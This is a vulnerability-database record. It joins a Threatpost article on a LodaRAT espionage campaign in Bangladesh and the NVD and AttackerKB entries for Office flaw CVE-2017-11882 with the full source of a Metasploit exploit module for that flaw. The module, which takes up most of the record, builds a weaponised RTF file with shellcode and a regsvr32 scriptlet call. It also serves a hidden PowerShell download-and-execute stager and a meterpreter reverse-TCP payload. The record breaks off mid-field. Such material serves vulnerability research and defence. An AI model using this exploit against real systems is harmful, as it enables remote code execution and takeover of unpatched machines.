{"id": "THREATPOST:639050E94B84AD3926F64EF305F67AB4", "type": "threatpost", "bulletinFamily": "info", "title": "Android Devices Hunted by LodaRAT Windows Malware", "description": "A newly discovered variant of the LodaRAT malware, which has historically targeted Windows devices, is being distributed in an ongoing campaign that now also hunts down Android devices and spies on victims.\n\nAlong with this, an updated version of LodaRAT for Windows has also been identified; both versions were seen in a recent campaign targeting Bangladesh, researchers said.\n\nThe campaign reflects an overarching shift in strategy for LodaRAT\u2019s developers, as the attack appears to be driven by espionage rather than its previous financial goals. While previous versions of LodaRAT contained credential-stealing capabilities that researchers speculated were used for draining victims\u2019 bank accounts, these newer versions come with a full roundup of information-gathering commands.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe fact that the threat group has evolved into hybrid campaigns targeting Windows and Android shows a group that is thriving and evolving,\u201d said researchers with Cisco Talos, [on Tuesday](<https://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html>). \u201cAlong with these improvements, the threat actor has now focused on specific targets, indicating more mature operational capabilities. As is the case with earlier versions of Loda, both versions of this new iteration pose a serious threat, as they can lead to a significant data breach or heavy financial loss.\u201d\n\n## **What is the LodaRAT Malware?**\n\nLodaRAT, [first discovered](<https://www.proofpoint.com/us/threat-insight/post/introducing-loda-malware>) in September 2016, is a remote access trojan (RAT) that comes with a variety of capabilities for spying on victims, such as recording the microphones and webcams of victims\u2019 devices. The name \u201cLoda\u201d is derived from a directory to which the malware author chose to write keylogger logs.\n\nSince its discovery in 2016 the RAT has proliferated, with multiple new versions being spotted in the wild [as recently as September](<https://blog.talosintelligence.com/2020/09/lodarat-update-alive-and-well.html>). The RAT, which is written in AutoIT, appears to be distributed by multiple cybercrime groups that have been using it to target numerous verticals.\n\n## **Recent LodaRAT Cyberattack in Bangladesh**\n\nResearchers observed a campaign involving LodaRAT that began in October and is still active. The attackers appear to have a specific interest in Bangladesh-based organizations, including banks and carrier-grade voice-over-IP (VoIP) software vendors.\n\nVitor Ventura, Cisco Talos\u2019 technical lead and senior security researcher, told Threatpost that the initial attack vectors for the campaign involved emails sent to victims with links to malicious applications (involving both the Windows and Android versions) or malicious documents (involving just the Windows version).\n\n\u201cThe campaign uncovered targeting Bangladesh used different levels of lures, from type squatted domains, to file names directly linked to products or services of their victims,\u201d said researchers.\n\nFor the Windows-targeting maldoc attack, after the victim clicked on the malicious documents, attackers used a malicious RTF document, which exploits CVE-2017-11882 ([a remote code-execution vulnerability](<https://threatpost.com/microsoft-arbitrary-code-execution-old-bug/145527/>) existing in Microsoft Office) in order to then download LodaRAT.\n\n## **LodaRAT\u2019s New Android Variant **\n\nThe Android version of the LodaRAT malware, which researchers call \u201cLoda4Android,\u201d is \u201crelatively simple when compared to other Android malware,\u201d said researchers. For instance, the RAT has specifically avoided techniques often used by Android banking trojans, such as [leveraging the Accessibility APIs,](<https://threatpost.com/android-overlay-and-accessibility-features-leave-millions-at-risk/125888/>) in order to steal data.\n\nThe underlying command-and-control (C2) protocol follows the same design pattern as the Windows version, said researchers \u2013 suggesting that the C2 code will be able to handle both versions.\n\nAlso, Loda4Android has \u201call the components of a stalker application\u201d said researchers. The malware collects location data and records audio, and can take photos and screenshots.\n\n\u201cIt can record audio calls, but it will only record what the victim says but not what the counterpart says,\u201d said researchers. \u201cThe common SMS, call log and contact exfiltration functionalities are also present. It is interesting to note that it\u2019s not capable of intercepting the SMS or the calls, like it\u2019s usually seen in banker trojans.\u201d\n\n## **Fresh Windows Loda Version**\n\nThe new version of the LodaRAT that targets Windows systems is version 1.1.8. While it\u2019s mostly the same as previous versions, new commands have been added that extend its capabilities.\n\nFor one, the version comes with new commands that give the threat actor remote access to the target machine via [the Remote Desktop Protocol](<https://threatpost.com/threat-actors-can-exploit-windows-rdp-servers-to-amplify-ddos-attacks/163248/>) (RDP). The new version can now leverage the BASS audio library to capture audio from a connected microphone. BASS is used in Win32, macOS, Linux and PocketPC software to provide streaming and recording functions for music.\n\n\u201cThis new command is an improvement on the previous \u2018Sound\u2019 command which used Windows\u2019 built in Sound Recorder,\u201d said researchers. \u201cThe reason for abandoning the previous method is likely because Windows Sound Recorder can only record audio for a maximum of 60 seconds. The new method allows for any length of recording time specified by the threat actor.\u201d\n\n**Download our exclusive **[**FREE Threatpost Insider eBook**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=FEATURE&utm_medium=FEATURE&utm_campaign=Nov_eBook>) _**Healthcare Security Woes Balloon in a Covid-Era World**_**, sponsored by ZeroNorth, to learn more about what these security risks mean for hospitals at the day-to-day level and how healthcare security teams can implement best practices to protect providers and patients. Get the whole story and **[**DOWNLOAD the eBook now**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_eBook>)** \u2013 on us!**\n", "published": "2021-02-09T15:47:03", "modified": "2021-02-09T15:47:03", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://threatpost.com/android-devices-lodarat-windows/163769/", "reporter": "Lindsey O'Donnell", "references": ["https://threatpost.com/newsletter-sign/", "https://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html", "https://www.proofpoint.com/us/threat-insight/post/introducing-loda-malware", "https://blog.talosintelligence.com/2020/09/lodarat-update-alive-and-well.html", "https://threatpost.com/microsoft-arbitrary-code-execution-old-bug/145527/", "https://threatpost.com/android-overlay-and-accessibility-features-leave-millions-at-risk/125888/", "https://threatpost.com/threat-actors-can-exploit-windows-rdp-servers-to-amplify-ddos-attacks/163248/", "https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=FEATURE&utm_medium=FEATURE&utm_campaign=Nov_eBook", "https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_eBook"], "cvelist": ["CVE-2017-11882"], "lastseen": "2021-02-09T19:52:36", "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-11882"]}, {"type": "attackerkb", "idList": ["AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882/", "MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882"]}, {"type": "symantec", "idList": ["SMNTC-101757"]}, {"type": "fireeye", "idList": ["FIREEYE:81A95C8CF481913A870A3CEAAA7AF394"]}, {"type": "myhack58", "idList": ["MYHACK58:62201892253", "MYHACK58:62201892510", "MYHACK58:62201891962"]}, {"type": "threatpost", "idList": ["THREATPOST:D55054CEF7EC85590BCAC2F18EED6FFC", "THREATPOST:85DCC5523A4DCF507633F07B43FE638A", "THREATPOST:195656DFCDBB1B18C4B0E899AA2C96DE", "THREATPOST:DCEC8DA2CC98CD3F9DF8B10773BD6F01", "THREATPOST:415E19FC1402E6223871B55143D39C98", "THREATPOST:A45F038EA4091EC6AC414522EC7B04B6", "THREATPOST:6C50260122AE142A1AA28DCFDE4EA98B", "THREATPOST:EE5FF4DE95B4AED68C90DCB6444B6560", "THREATPOST:404B86130415376C2173D576AAD37DC8", "THREATPOST:A959F2AFFE1161A65066EACCFB0D5FCA", "THREATPOST:61AC6ABD7798785567FFEEBEF573CDF8", "THREATPOST:63CE702F4E603943CC93B9603382C660", "THREATPOST:212ACE7085CC094D6542F00AF0A4D1B4"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310812083", "OPENVAS:1361412562310812148"]}, {"type": "cert", "idList": ["VU:421280"]}], "modified": "2021-02-09T19:52:36", "rev": 2}, "score": {"value": 5.9, "vector": "NONE", "modified": "2021-02-09T19:52:36", "rev": 2}, "vulnersScore": 5.9}, "immutableFields": []}

{"cve": [{"lastseen": "2021-03-17T14:01:35", "description": "Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1, and Microsoft Office 2016 allow an attacker to run arbitrary code in the context of the current user by failing to properly handle objects in memory, aka \"Microsoft Office Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11884.", "edition": 6, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2017-11-15T03:29:00", "title": "CVE-2017-11882", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2021-03-16T17:21:00", "cpe": ["cpe:/a:microsoft:office:2007", "cpe:/a:microsoft:office:2010", "cpe:/a:microsoft:office:2013", "cpe:/a:microsoft:office:2016"], "id": "CVE-2017-11882", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11882", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:office:2016:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2010:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2007:sp3:*:*:*:*:*:*", "cpe:2.3:a:microsoft:office:2013:sp1:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2021-03-17T06:34:05", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882", "CVE-2017-11884"], "description": "Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1, and Microsoft Office 2016 allow an attacker to run arbitrary code in the context of the current user by failing to properly handle objects in memory, aka \u201cMicrosoft Office Memory Corruption Vulnerability\u201d. This CVE ID is unique from CVE-2017-11884.\n\n \n**Recent assessments:** \n \n**hrbrmstr** at May 12, 2020 7:42pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016 Products \n\n * Associated Malware: Loki, FormBook, Pony/FAREIT \n\n * Mitigation: Update affected Microsoft products with the latest security patches \n\n * More Detail: <https://nvd.nist.gov/vuln/detail/CVE-2017-11882> \n\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133e>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "modified": "2021-03-17T00:00:00", "published": "2017-11-15T00:00:00", "id": "AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6", "href": "https://attackerkb.com/topics/oGYjzY0Hw3/cve-2017-11882", "type": "attackerkb", "title": "CVE-2017-11882", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-10-15T09:46:17", "description": "Module exploits a flaw in how the Equation Editor that allows an attacker to execute arbitrary code in RTF files without interaction. The vulnerability is caused by the Equation Editor, to which fails to properly handle OLE objects in memory.\n", "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "Microsoft Office CVE-2017-11882", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-11882"], "modified": "1976-01-01T00:00:00", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::Powershell\n include Msf::Exploit::EXE\n include Msf::Exploit::FILEFORMAT\n\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft Office CVE-2017-11882',\n 'Description' => %q{\n Module exploits a flaw in how the Equation Editor that\n allows an attacker to execute arbitrary code in RTF files without\n interaction. The vulnerability is caused by the Equation Editor,\n to which fails to properly handle OLE objects in memory.\n },\n 'Author' => ['mumbai', 'embedi'],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => '2017-11-15',\n 'References' => [\n ['CVE', '2017-11882'],\n ['URL', 'https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about'],\n ['URL', 'https://github.com/embedi/CVE-2017-11882']\n ],\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [\n ['Microsoft Office', {} ],\n ],\n 'DefaultTarget' => 0,\n 'Payload' => {\n 'DisableNops' => true\n },\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/meterpreter/reverse_tcp'\n }\n ))\n\n register_options([\n OptString.new(\"FILENAME\", [true, \"Filename to save as, or inject\", \"msf.rtf\"]),\n OptString.new(\"FOLDER_PATH\", [false, \"Path to file to inject\", nil])\n ])\n end\n\n def retrieve_header(filename)\n if (not datastore['FOLDER_PATH'].nil?)\n path = \"#{datastore['FOLDER_PATH']}/#{datastore['FILENAME']}\"\n else\n path = nil\n end\n if (not path.nil?)\n if ::File.file?(path)\n File.open(path, 'rb') do |fd|\n header = fd.read(fd.stat.size).split('{\\*\\datastore').first\n header = header.to_s # otherwise I get nil class...\n print_status(\"Injecting #{path}...\")\n return header\n end\n else\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9'\n end\n else\n header = '{\\rtf1\\ansi\\ansicpg1252\\deff0\\nouicompat\\deflang1033{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}}' + \"\\n\"\n header << '{\\*\\generator Riched20 6.3.9600}\\viewkind4\\uc1' + \"\\n\"\n header << '\\pard\\sa200\\sl276\\slmult1\\f0\\fs22\\lang9'\n end\n return header\n end\n\n\n\n def generate_rtf\n header = retrieve_header(datastore['FILENAME'])\n object_class = '{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}\\objw380\\objh260{\\*\\objdata '\n object_class << '01050000020000000b0000004571756174696f6e2e33000000000000000000000'\n object_class << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff'\n object_class << '09000600000000000000000000000100000001000000000000000010000002000'\n object_class << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040'\n object_class << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0'\n object_class << '07400720079000000000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000000000000000016000500ffffffffffffffff02000'\n object_class << '00002ce020000000000c0000000000000460000000000000000000000008020ce'\n object_class << 'a5613cd30103000000000200000000000001004f006c006500000000000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '000000000000001400000000000000010043006f006d0070004f0062006a00000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '0000000000000000000000000000120002010100000003000000ffffffff00000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '0001000000660000000000000003004f0062006a0049006e0066006f000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000012000201ffffffff04000000ffffffff000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000003'\n object_class << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060'\n object_class << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'\n object_class << 'ffffff01000002080000000000000000000000000000000000000000000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000'\n object_class << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045'\n object_class << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000'\n object_class << '00000000000000000000000000000000000000000000000000000000000000000'\n object_class << \"00000300040000000000000000000000000000000000000000000000000000000\"\n object_class << \"000000000000000000000000000000000000000000000000000000000000000\\n\"\n\n\n shellcode = \"\\x1c\\x00\" # 0: 1c 00 sbb al,0x0\n shellcode << \"\\x00\\x00\" # 2: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x02\\x00\" # 4: 02 00 add al,BYTE PTR [eax]\n shellcode << \"\\x9e\" # 6: 9e sahf\n shellcode << \"\\xc4\\xa9\\x00\\x00\\x00\\x00\" # 7: c4 a9 00 00 00 00 les ebp,FWORD PTR [ecx+0x0]\n shellcode << \"\\x00\\x00\" # d: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\xc8\" # f: 00 c8 add al,cl\n shellcode << \"\\xa7\" # 11: a7 cmps DWORD PTR ds:[esi],DWORD PTR es:[edi]\n shellcode << \"\\\\\" # 12: 5c pop esp\n shellcode << \"\\x00\\xc4\" # 13: 00 c4 add ah,al\n shellcode << \"\\xee\" # 15: ee out dx,al\n shellcode << \"[\" # 16: 5b pop ebx\n shellcode << \"\\x00\\x00\" # 17: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\x00\" # 19: 00 00 add BYTE PTR [eax],al\n shellcode << \"\\x00\\x03\" # 1b: 00 03 add BYTE PTR [ebx],al\n shellcode << \"\\x01\\x01\" # 1d: 01 01 add DWORD PTR [ecx],eax\n shellcode << \"\\x03\\n\" # 1f: 03 0a add ecx,DWORD PTR [edx]\n shellcode << \"\\n\\x01\" # 21: 0a 01 or al,BYTE PTR [ecx]\n shellcode << \"\\x08ZZ\" # 23: 08 5a 5a or BYTE PTR [edx+0x5a],bl\n shellcode << \"\\xB8\\x44\\xEB\\x71\\x12\" # 26: b8 44 eb 71 12 mov eax,0x1271eb44\n shellcode << \"\\xBA\\x78\\x56\\x34\\x12\" # 2b: ba 78 56 34 12 mov edx,0x12345678\n shellcode << \"\\x31\\xD0\" # 30: 31 d0 xor eax,edx\n shellcode << \"\\x8B\\x08\" # 32: 8b 08 mov ecx,DWORD PTR [eax]\n shellcode << \"\\x8B\\x09\" # 34: 8b 09 mov ecx,DWORD PTR [ecx]\n shellcode << \"\\x8B\\x09\" # 36: 8b 09 mov ecx,DWORD PTR [ecx]\n shellcode << \"\\x66\\x83\\xC1\\x3C\" # 38: 66 83 c1 3c add cx,0x3c\n shellcode << \"\\x31\\xDB\" # 3c: 31 db xor ebx,ebx\n shellcode << \"\\x53\" # 3e: 53 push ebx\n shellcode << \"\\x51\" # 3f: 51 push ecx\n shellcode << \"\\xBE\\x64\\x3E\\x72\\x12\" # 40: be 64 3e 72 12 mov esi,0x12723e64\n shellcode << \"\\x31\\xD6\" # 45: 31 d6 xor esi,edx\n shellcode << \"\\xFF\\x16\" # 47: ff 16 call DWORD PTR [esi]\n shellcode << \"\\x53\" # 49: 53 push ebx\n shellcode << \"\\x66\\x83\\xEE\\x4C\" # 4a: 66 83 ee 4c sub si,0x4c\n shellcode << \"\\xFF\\x10\" # 4e: ff 10 call DWORD PTR [eax]\n shellcode << \"\\x90\" # 50: 90 nop\n shellcode << \"\\x90\" # 50: 90 nop\n\n footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'\n footer << '4500710075006100740069006F006E0020004E006100740069007600650000000'\n footer << '00000000000000000000000000000000000000000000000000000'\n footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000400'\n footer << '0000C5000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00'\n footer << '000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000000000'\n footer << '000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000000000000000000000000000000000000000000000000FFFFFF'\n footer << 'FFFFFFFFFFFFFFFFFF000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '0000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000'\n footer << '00000000000000000000000000000000000000000000000000000000000000000'\n footer << '00000000000000001050000050000000D0000004D45544146494C'\n footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C'\n footer << '500000002001C0000000000050000000902000000000500000002'\n footer << '0101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF'\n footer << '000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE00000000000090'\n footer << '01000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A60019016'\n footer << '0A000000313131313131313131310C000000320A6001100F0A000000313131313131313131310C000000320A600190070A00000031313131313131'\n footer << '3131310C000000320A600110000A000000313131313131313131310A00000026060F000A00FFFFFFFF0100000000001C000000FB02100007000000'\n footer << '0000BC02000000000102022253797374656D000048008A0100000A000600000048008A01FFFFFFFF7CEF1800040000002D01010004000000F00100'\n footer << '00030000000000' + \"\\n\"\n footer << '}{\\result{\\pict{\\*\\picprop}\\wmetafile8\\picw380\\pich260\\picwgoal380\\pichgoal260' + \"\\n\"\n footer << \"0100090000039e00000002001c0000000000050000000902000000000500000002010100000005\\n\"\n footer << \"0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002\\n\"\n footer << \"1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000\\n\"\n footer << \"0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000\\n\"\n footer << \"0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000\\n\"\n footer << \"002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100\\n\"\n footer << \"000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a\\n\"\n footer << \"0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300\\n\"\n footer << \"00000000\\n\"\n footer << \"}}}\\n\"\n footer << '\\par}' + \"\\n\"\n\n\n payload = shellcode\n payload += [0x00402114].pack(\"V\")\n payload += \"\\x00\" * 2\n payload += \"regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll\"\n payload = (payload + (\"\\x00\" * (197 - payload.length))).unpack('H*').first\n payload = header + object_class + payload + footer\n payload\n end\n\n\n\n def gen_psh(url, *method)\n ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl\n\n if method.include? 'string'\n download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))\n else\n # Random filename to use, if there isn't anything set\n random = \"#{rand_text_alphanumeric 8}.exe\"\n # Set filename (Use random filename if empty)\n filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME']\n\n # Set path (Use %TEMP% if empty)\n path = datastore['BinaryEXE-PATH'].blank? ? \"$env:temp\" : %Q('#{datastore['BinaryEXE-PATH']}')\n\n # Join Path and Filename\n file = %Q(echo (#{path}+'\\\\#{filename}'))\n\n # Generate download PowerShell command\n download_string = Rex::Powershell::PshMethods.download_run(url, file)\n end\n\n download_and_run = \"#{ignore_cert}#{download_string}\"\n\n # Generate main PowerShell command\n return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)\n end\n\n def on_request_uri(cli, _request)\n if _request.raw_uri =~ /\\.sct$/\n print_status(\"Handling request for .sct from #{cli.peerhost}\")\n payload = gen_psh(\"#{get_uri}\", \"string\")\n data = gen_sct_file(payload)\n send_response(cli, data, 'Content-Type' => 'text/plain')\n else\n print_status(\"Delivering payload to #{cli.peerhost}...\")\n p = regenerate_payload(cli)\n data = cmd_psh_payload(p.encoded,\n payload_instance.arch.first,\n remove_comspec: true,\n exec_in_place: true\n )\n send_response(cli, data, 'Content-Type' => 'application/octet-stream')\n end\n end\n\n\n def rand_class_id\n \"#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}\"\n end\n\n\n def gen_sct_file(command)\n # If the provided command is empty, a correctly formatted response is still needed (otherwise the system raises an error).\n if command == ''\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"></registration></scriptlet>}\n # If a command is provided, tell the target system to execute it.\n else\n return %{<?XML version=\"1.0\"?><scriptlet><registration progid=\"#{Rex::Text.rand_text_alphanumeric 8}\" classid=\"{#{rand_class_id}}\"><script><![CDATA[ var r = new ActiveXObject(\"WScript.Shell\").Run(\"#{command}\",0);]]></script></registration></scriptlet>}\n end\n end\n\n\n def primer\n file_create(generate_rtf)\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/office_ms17_11882.rb", "cvss": {"score": 9.3, "vector": 